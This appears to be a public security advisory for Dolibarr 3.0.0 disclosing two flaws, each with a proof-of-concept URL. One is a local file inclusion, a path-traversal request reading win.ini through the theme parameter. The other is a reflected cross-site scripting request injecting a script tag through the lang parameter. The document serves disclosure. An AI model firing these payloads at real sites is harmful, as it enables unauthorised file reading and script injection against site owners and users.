47 lines
No EOL
1.7 KiB
Text
47 lines
No EOL
1.7 KiB
Text
------------------------------------------------------------------------
|
|
Software................Dolibarr 3.0.0
|
|
Vulnerability...........Local File Inclusion
|
|
Threat Level............Critical (4/5)
|
|
Download................http://www.dolibarr.org/
|
|
Discovery Date..........4/21/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
A local file inclusion vulnerability in Dolibarr 3.0.0 can be
|
|
exploited to include arbitrary files.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
|
|
|
------------------------------------------------------------------------
|
|
Software................Dolibarr 3.0.0
|
|
Vulnerability...........Reflected Cross-site Scripting
|
|
Threat Level............Low (1/5)
|
|
Download................http://www.dolibarr.org/
|
|
Discovery Date..........4/21/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
A reflected cross-site scripting vulnerability in Dolibarr 3.0.0 can
|
|
be exploited to execute arbitrary JavaScript.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E |